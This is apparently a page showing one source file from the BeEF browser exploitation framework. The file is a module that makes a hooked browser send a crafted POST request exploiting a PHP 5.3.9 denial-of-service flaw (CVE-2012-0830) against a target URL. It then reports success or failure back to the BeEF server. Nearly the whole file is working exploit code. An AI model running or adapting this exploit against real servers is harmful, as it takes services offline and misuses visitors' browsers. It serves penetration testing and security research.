CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/php-5.3.9-dos/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830)
10
// PoC written by Paul Westin
11
// PoC ported to BeEF by bcoles
12
// Bug discovered by Stefan Esser (@i0n1c)
13
// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
14

15
// Generate 1000 normal keys and one array
16
function createEvilObj () {
17
    var evil_obj = {};
18
    for (var i = 0; i < 1001; i++) {
19
        evil_obj[i] = 1;
20
    }
21
    evil_obj['kill[]'] = 'kill';
22
    return evil_obj;
23
}
24

25
// Serialize Javascript object into POST data
26
function serializeObj (obj) {
27
    var str = [];
28
    for(var p in obj) {
29
        str.push(p + "=" + obj[p]);
30
    }
31
    return str.join("&");
32
}
33

34
// Run attack
35
function php_dos (target_url) {
36
    var bad = serializeObj(createEvilObj());
37
    var xhr = new XMLHttpRequest();
38
    xhr.open("POST", target_url, true);
39
    xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
40
    xhr.setRequestHeader('Content-Length', bad.length);
41
    xhr.send(bad);
42
}
43

44
try {
45
    php_dos("<%= @url %>");
46
    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
47
} catch (e) {
48
    beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
49
}
50

51
});
52

53

54
Product

Resources

Company
